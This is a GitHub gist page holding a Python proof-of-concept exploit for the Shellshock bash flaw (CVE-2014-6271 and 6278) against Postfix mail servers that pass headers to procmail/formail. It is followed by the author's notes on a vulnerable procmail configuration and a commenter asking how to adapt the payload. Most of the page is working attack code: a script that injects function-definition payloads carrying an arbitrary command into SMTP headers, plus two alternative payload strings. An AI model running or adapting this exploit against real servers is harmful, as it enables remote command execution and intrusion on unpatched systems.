Skip to content

Instantly share code, notes, and snippets.

@claudijd

claudijd/exploit.py

Last active August 7, 2021 11:45
Show Gist options
  • Save claudijd/33771b6c17bc2e4bc59c to your computer and use it in GitHub Desktop.
Save claudijd/33771b6c17bc2e4bc59c to your computer and use it in GitHub Desktop.
Download ZIP
Postfix Shellshock PoC Testing
Raw
exploit.py
#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271
from socket import *
import sys
def usage():
print "shellshock_smtp.py <target> <command>"
argc = len(sys.argv)
if(argc < 3 or argc > 3):
usage()
sys.exit(0)
rport = 25
rhost = sys.argv[1]
cmd = sys.argv[2]
headers = ([
"To",
"References",
"Cc",
"Bcc",
"From",
"Subject",
"Date",
"Message-ID",
"Comments",
"Keywords",
"Resent-Date",
"Resent-From",
"Resent-Sender"
])
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, rport))
# banner grab
s.recv(2048*4)
def netFormat(d):
d += "\n"
return d.encode('hex').decode('hex')
data = netFormat("mail from:<>")
s.send(data)
s.recv(2048*4)
data = netFormat("rcpt to:<root@localhost>")
s.send(data)
s.recv(2048*4)
data = netFormat("data")
s.send(data)
s.recv(2048*4)
data = ''
for h in headers:
# Original
data += netFormat(h + ":() { :; };" + cmd)
# Variant 1 - CVE-2014-6271
#data += netFormat(h + ":'() { :; }; " + cmd + "' bash -c : ")
# Variant 2 - CVE-2014-6278
#data += netFormat(h + ":'() { _; } >_[$($())] { " + cmd + "; }' bash -c :")
data += netFormat(cmd)
# <CR><LF>.<CR><LF>
data += "0d0a2e0d0a".decode('hex')
s.send(data)
s.recv(2048*4)
data = netFormat("quit")
s.send(data)
s.recv(2048*4)
@claudijd
Copy link
Author

Ok, finally got this working...

If a user is using a .procmailrc and using formail to export specific header attributes from the email, it's possible for an attacker to obtain code execution via the email headers set in the original PoC assuming the target address is modified to that of a valid user.

Here's a viable example I used to verify code execution in a Postfix + Procmail + Formail combination...

VERBOSE=yes
PATH=/bin:/usr/bin:/usr/local/bin
SHELL=/bin/bash
MAILDIR=$HOME/mail
PMDIR=$HOME/Procmail
LOGFILE=$PMDIR/log
INCLUDERC=$PMDIR/test.rc
INCLUDERC=$PMDIR/lists.rc
SHELL=/bin/sh

SUBJECT=`formail -xSubject:`
FROM=`formail -rt -xTo:`

:0:
* ^Subject:.*
| (formail)

@fahrishih
Copy link

Hi, very good post.

The format I'm trying exploit is slightly different.
Can you explain how to generate the payload according to the format?

    # Original
    data += netFormat(h + ":() { :; };" + cmd)
    
    # Variant 1 - CVE-2014-6271
    #data += netFormat(h + ":'() { :; }; " + cmd + "' bash -c : ")
 
    # Variant 2 - CVE-2014-6278
    #data += netFormat(h + ":'() { _; } >_[$($())] { " + cmd + "; }' bash -c :")

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment